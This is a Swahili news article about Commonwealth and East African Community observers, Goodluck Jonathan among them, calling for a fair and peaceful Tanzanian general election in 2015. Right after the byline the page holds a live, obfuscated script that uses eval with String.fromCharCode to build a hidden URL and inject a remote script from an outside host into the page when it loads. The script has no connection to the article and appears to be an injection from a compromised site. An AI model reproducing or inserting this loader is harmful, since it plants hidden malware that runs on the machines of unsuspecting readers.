Recent Comments

Tume yatakiwa kuhakikisha uchaguzi wa haki, usawa

By Baraka Bitariho Oct 21, 2015
<script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

Nigerian-President-Goodluck-Jonathan-300x190

Na Wandishi Wetu, Dar es Salaam

TUME ya Taifa ya Uchaguzi(NEC) kwa kushirikiana na vyombo vya ulinzi na usalama imetakiwa kuhakikisha uchaguzi unafanyika kwa haki na usawa kuepuka machafuko yasitokee nchini.

Akizungumza na waandishi wa habari Dar es Salaam jana, Mwenyekiti wa Waangalizi wa Uchaguzi wa Jumuiya ya Madola, Goodluck Jonathan, alisema kufanikiwa kwa uchaguzi huo kunategemea kuwapo uwazi, haki na kufuata misingi ya utawala bora.

Alisema ili kuhakikisha amani inakuwapo watakuwa na mazungumzo na NEC, vyama vya siasa, wadau wa amani, wanadiplomasia na makundi mengine ya uangalizi wa ndani kujadili jinsi watakvyojipanga kuhakikisha uchaguzi unafanyika kwa haki na uwazi.

“Kwa kipindi chote ambacho tutakuwapo Tanzania tutajaribu kuangalia mazingira kabla, wakati na baada ya uchaguzi, kama kutatokea kasoro zozote katika kipindi hicho.

“Baada ya kugundua kasoro zitakazojitokeza tutakabidhi ripoti kwa Katibu mkuu wa Jumuiya hii na baadhi ya waangalizi washirika na wadau mbalimbali,”alisema Jonathan.

Alisema waangalizi hao wataanza kazi yao Oktoba 23 ambako watatawanyika kwa makundi katika kila mkoa kwa ajili ya maandalizi ya uchaguzi huo.

Jonathan alisema waangalizi hao kazi yao itakuwa ni kuangalia muda wa kufungua na kufunga vituo, kura zitakavyopigwa na mambo mengine yatakayokuwa yakiendelea hadi mchakato mzima wa utangazaji matokeo utakavyofanyika.

“Tunatarajia kufanya uangalizi wa kutokuegemea upande wowote pamoja na kuwa wawazi katika mchakato mzima wa uchaguzi.

“Ninaamini waangalizi hawa watashirikiana vizuri na Watanzania katika kuidumisha amani hasa katika kipindi hiki cha Uchaguzi Mkuu,” alisema Jonathan.

Nao waangalizi wa Jumuiya ya Afrika Mashariki (EAC) jana walizindua uangalizi huo na kusema watasimamia mchakato mzima wa Uchaguzi Mkuu na kuhakikisha unakuwa wa haki na amani.

Katibu Mkuu wa Jumuiya hiyo, Charles Njoroge, aliwataka watanzania kufanya uchaguzi wa amani unaozingatia demokrasia kuepuka kuingia katika machafuko.

Alisema uchaguzi ni muhimu kutawaliwa na msingi wa demokrasia na kuitaka Tume ya Taifa ya Uchaguzi (NEC)kushughulikia kasoro na changamoto zote zilizoonekana kuweka mambo sawa na kuepuka kuingia katika machafuko.

“Waangalizi watahudhuria kila kituo cha kupigia kura kushuhudia yanayoendelea na lengo letu ni kuripoti kwamba uchaguzi huu umefuata misingi ya utawala bora, demokrasia na haki,” alisema Njoroge.

Naye Kiongozi wa waangalizi hao ambaye pia ni Makamu wa Rais Mstaafu wa Kenya, Arthur Awori, alisema katika uchaguzi huo hawatajiingiza katika suala zima la uvunjifu wa amani bali watafuata utaratibu na sheria ya jumuiya hiyo.

Alisema lengo lao ni kusimamia na kuhakikisha mambo yote ya uchaguzi yanaenda sawa kwa kufuata kanuni, taratibu na sheria za nchi.

“Sisi tupo kama wasimamizi tu na kufuatilia kwamba uchaguzi huo sheria imefuatwa ili kuendeleza amani na utulivu uliopo katika nchi hii.

“Tupo hapa kwa mujibu wa sheria iliyokuwapo EAC ambayo inatutaka kuhudhuria na kuripoti mwenendo wa uchaguzi utakaofanyika kwa kila nchi,” alisema.

Katibu Mkuu wa Wizara ya Jumuiya ya Afrika Mashariki, Joyce Mapunjo, alisema watasimamia na kufanya kazi kama sheria ya Tanzania inavyosema na kuhakikisha uchaguzi huo unafanyika kwa amani.

Pia aliwataka Watanzania wanapowaona watu hao wasishangae kwa sababu wamekuja kusimamia uchaguzi na wawachukulie kama wenzao.

OP Mtanzania

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com